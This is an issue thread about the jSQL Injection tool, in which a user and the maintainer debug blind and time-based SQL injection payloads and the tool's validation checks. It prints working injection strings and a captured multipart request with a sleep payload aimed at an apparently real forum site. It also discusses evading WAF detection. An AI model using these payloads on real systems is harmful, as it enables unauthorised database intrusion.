Fails to validate the valid payload

[mastercho]

Hello, sorry to rise an old question but the Discussion section is not enabled.

trying to achieve this payload which includes OR and AND in blind injection but whatever i do jsql fails to validate it...

1' OR 3*2*1=6 AND 000913=000913 --

So editing blind strategy to ' ${boolean.mode} 3*2*1=6 AND ${test} im getting

1%27OR+3*2*1=6+AND+0%2b1=1--+-L6hK

jsql fails to validate the payload another valid payload is for time-based

1 AND (SELECT 7670 FROM (SELECT(SLEEP(5)))JESy) what i did in SQL Engine was in Strategy->Time to add

 ${boolean.mode}
(SELECT 7670 FROM 
 (SELECT(SLEEP(
${sleep_time}
)))JESy)

and take out the end comment from Configuration but the result which i get is

1AND%28SELECT+7670+FROM%28SELECT%SLEEP%286%29%29%29JESy%29--+-v2LU

Still adding end comments even i take it out from Configuration and there is no space between commands and i think that's why failing in injection

And wanna ask how to run a check on multipart content-type?

[ron190]

1. [...] trying this payload OR and AND in blind injection [...] ' ${boolean.mode} 3*2*1=6 AND ${test}

First let's take a high level example and assume that the server is running this query pattern which is always false:

sql$ SELECT result FROM (SELECT 1 result)x WHERE 'unknown'='<payload>'
===> 0 row

To exploit such query it means that the payload has to have a OR pattern to bypass the WHERE which is always false, otherwise the result will always be unreliable:

payload: ' OR <test> --+

With each part of the payload explained:

': Closes the default string
OR: Bypasses the always false with a dynamic <test>
<test>: Blind or Time character test
--+: Closes the query properly

So the end query should be similar to this for the <test> to be reliable:

sql$ SELECT result FROM (SELECT 1 result)x WHERE 'unknown'='' OR <test> --+'
===> 1 row when <test>=true
===> 0 row when <test>=false

Now imagine you use a always true statement like 3*2*1=6 in the OR statement, the <test> becomes always true and is now unreliable:

sql$ SELECT result FROM (SELECT 1 result)x WHERE 'unknown'='' OR 3*2*1=6 AND <test> --+'
===> always 1 row 

That's why the default Blind payload is just ${boolean.mode} ${test}, it generates either AND <test> or OR <test> depending of the one that works.

2. [...] another valid payload is for time-based

Various remarks:

• Like previous answer, if the server is using a always false query like WHERE 'unknown'='<payload>' then you have to be in a OR. Do not use a always true statement like 3*2*1=6 in the OR otherwise the strategy will fail (see previous paragraph)

• The default Time pattern which is IF(<test>,1,SLEEP) should work fine, though you can adapt it or change it to another one like (SELECT SLEEP FROM (select 1)x WHERE <test>). You must note that each pattern is containing the <test>.

Default Time payload with IF:

${boolean.mode} if(
    ${test},
    1,
    sleep(${sleep_time})
)

Another Time payload with SELECT:

${boolean.mode} (
    SELECT SLEEP(${sleep_time}) 
    FROM (select 1)x 
    WHERE ${test}
)

• I don't see the <test> in your payload below:

 ${boolean.mode}
(SELECT 7670 FROM 
 (SELECT(SLEEP(
${sleep_time}
)))JESy)

You have to add ${test} somewhere for the strategy to make sense.

• The JESy in the middle of the SQL query is a syntax error and can't be valid

• The following similar payload you are using seems incorrect because the SLEEP is always evaluated before the <test>, which makes every queries to sleep and makes strategy unreliable:

${boolean.mode} (
    SELECT 1
    FROM (SLEEP(${sleep_time}) )x 
    WHERE ${test}
)
===> always sleeping

3. how to run a check on multipart content-type?

I'm not sure that the header field next to the address bar would be usable for that, theoretically I guess. But I'm not really aware of the multipart use-case in regard to SQL injection. Processing injection during a multipart upload of a file? I suppose it's not really common though I may be mistaking.

[mastercho]

My point was that even i recreate a valid payload for jsql, it doesn't find as a true payload when testing manually they are injectable but not in jsql.

Multipart is not always for uploading files here example request

POST /misc.php?do=dodonate HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.{REDACTED}.com/
Cookie: bb_lastvisit=1653177391; bb_lastactivity=0; bb_calendar=e4980fb9d4b7d67ea90ddd4e9326de3ef28a7a44a-3-%7Bs-7-.calyear._i-2016_s-8-.calmonth._i-12_s-8-.calview1._s-11-.displayweek._%7D; bb_forum_view=7ed3e6206555a26a04c1eb08f341ae0ae66a0a6ba-1-%7Bi-194_i-1653185564_%7D
Content-Length: 304
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.audioshark.org
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="securitytoken"

guest
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="chooser"

25|3
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="amount"

if(now()=sysdate(),sleep(6),0)
------------YWJkMTQzNDcw--

valid Time Based

About blind payload which one will be the most efficient strategy for Jsql to test from all tested payloads

-1' OR 2+913-913-1=0+0+0+1 -- => TRUE
-1' OR 3+913-913-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+913-913) -- => FALSE
-1' OR 3*2>(0+5+913-913) -- => FALSE
-1' OR 2+1-1+1=1 AND 000913=000913 -- => FALSE
-1' OR 3*2=5 AND 000913=000913 -- => FALSE
-1' OR 3*2=6 AND 000913=000913 -- => TRUE
-1' OR 3*2*0=6 AND 000913=000913 -- => FALSE
-1' OR 3*2*1=6 AND 000913=000913 -- => TRUE

Also when loading data if the site or connection timeouts jsql stops and starts from the beginning is there a way to overcome this? Why not seving the session and resume it or retry like 5-10 times then stop, that's pretty annoying bug.

[ron190]

• [...] when testing manually they are injectable but not in jsql [...] About blind payload which one will be the most efficient

You can define the list of Blind checks that must be true in the tab Truthy of the SQL Engine and adapt the default list to add new checks if really required. You can also adapt similarly checks that must be false in the tab Falsy.

Though the default list should be robust enough.

For example, I've added your Truthy checks to the default list and validated a Blind strategy (careful, plus sign + had to be urlencoded to %2B):

So a Blind/Time strategy must pass all the Truthy and Falsy checks in order to be valid. A single failure in one of the check will make the strategy to fail, so you may use the tab Network to debug what check has failed.

I've also reviewed the blind payloads you've listed and found a typo on the 4th one:

-1' OR 2+913-913-1=0+0+0+1 -- => TRUE :heavy_check_mark: -1' OR 3+913-913-1=0+0+0+1 -- => FALSE :heavy_check_mark: -1' OR 3*2<(0+5+913-913) -- => FALSE :heavy_check_mark: -1' OR 3*2>(0+5+913-913) -- => FALSE :red_circle: => TRUE -1' OR 2+1-1+1=1 AND 000913=000913 -- => FALSE :heavy_check_mark: -1' OR 3*2=5 AND 000913=000913 -- => FALSE :heavy_check_mark: -1' OR 32=6 AND 000913=000913 -- => TRUE :heavy_check_mark: -1' OR 320=6 AND 000913=000913 -- => FALSE :heavy_check_mark: -1' OR 32*1=6 AND 000913=000913 -- => TRUE :heavy_check_mark:

Use those dummy tests on any MySQL instance to validate the checks:

select result from (select 1 result)x where '1'='-1' OR 2+913-913-1=0+0+0+1 -- => TRUE
select result from (select 1 result)x where '1'='-1' OR 3+913-913-1=0+0+0+1 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2<(0+5+913-913) -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2>(0+5+913-913) -- => TRUE
select result from (select 1 result)x where '1'='-1' OR 2+1-1+1=1 AND 000913=000913 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2=5 AND 000913=000913 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2=6 AND 000913=000913 -- => TRUE
select result from (select 1 result)x where '1'='-1' OR 3*2*0=6 AND 000913=000913 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2*1=6 AND 000913=000913 -- => TRUE

jSQL should find the strategy automatically if you managed to manually confirm the injection, otherwise it means that one of the Truthy or Falsy checks has failed.

You can also review the pattern of any check URL to verify if it's correct, for example:

URL: 
http://localhost:8080/blind?tenant=mysql&name=3533535353%27+or+2%2B913-913-1=0%2B0%2B0%2B1--+-kpjE

3533535353%27: payload prefix similar to -1'
or: mode OR because query is always false
2%2B913-913-1=0%2B0%2B0%2B1: one of Truthy checks
--+-: payload suffix to comment the end of query
kpjE: random for cache purpose

• Multipart

I'll review how it's done on other tools to see if it could be integrated to jSQL.

• [...] if the site or connection timeouts jsql stops and starts from the beginning

I'm not sure to have encountered this behavior, when injection has failed then connection is closed and injection must be retried from the beginning for sure.

I'm currently not fond of session saving because it leads to other problems, like session resume/restore/corruption, and users are not aware of those session behaviors. Also usually when injection is done then the work is over and the user do not replay any session.

About unstable connection and timeouts, I would rather use the following options in Preferences:

Connection: Limit processing to X thread(s) ; default 10 threads
Injection: Disable database's metadata injection
Injection: Limit Normal UNION strategy to X column

[ron190]

Currently experimenting based on the discussion to add colors to the logs, making easier the debugging of Truthy/Falsy checks and of Boolean queries.

• Visual feedback in logs when a Boolean query is true :green_circle: or false :red_circle: . Here for Truthy and Falsy checks: every Falsy are false and every Truthy are true meaning that the injection pattern is confirmed:

• Visual feedback in logs on Blind queries when retrieving an ASCII character: :green_circle::red_circle::green_circle::red_circle::red_circle::green_circle::green_circle::red_circle: :arrow_right: 01100101 :arrow_right: e:

[mastercho]

Hey @ron190

Just checking back for updates...

How Visual feedback in logs development goes? And hope you will make changes to allow us to remove end comment as Time Based now can be exploited without end-comments and some WAFs detects when there is end-comment so still causing issue in Jsql for me and there is no option to remove it

[ron190]

In the meantime I've experimented with dark mode implementation, it was so painful that I gave up and lost focus on other features and used my free time elsewhere (single man project anyway :| if anyone can give a hand then enjoy and do a PR, it's ezpz).

So looking forward to motivate myself, the latest paper mentioning jSQL from security researchers brings some topics I want to program (see last tweet and ML paper: https://wootconference.org/papers/woot23-paper17.pdf), not limited to the following:

• finalize logs visual feedback and optimize main algorithm to reduce number of queries
• strategies for stacked query, DNS out-of-band and multi-bits injection (see "lightspeed" paper: https://aircconline.com/csit/papers/vol10/csit101909.pdf)
• continuous deployment with Kubernetes

@-to-all Anyone managing DNS out-of-band locally or on Docker, anyone giving instructions to reproduce is more than welcomed.

> @mastercho ...allow us to remove end comment as Time Based now can be exploited without end-comments...

Curious about a query sample, have you got any? Have you tested removing the end comment from the engine?

[ron190]

New release v0.86 includes colors in logs to track boolean queries more easily.

So when detection fails then checking for root causes is possible looking at the logs: all false queries must fail, all true queries must pass.

And ASCII characters can also be tracked in the logs.

• Prefix, Time and Blind successful detection

• Boolean bit query details: bit#{char-index}~{bitwise-index}:{ascii-letter}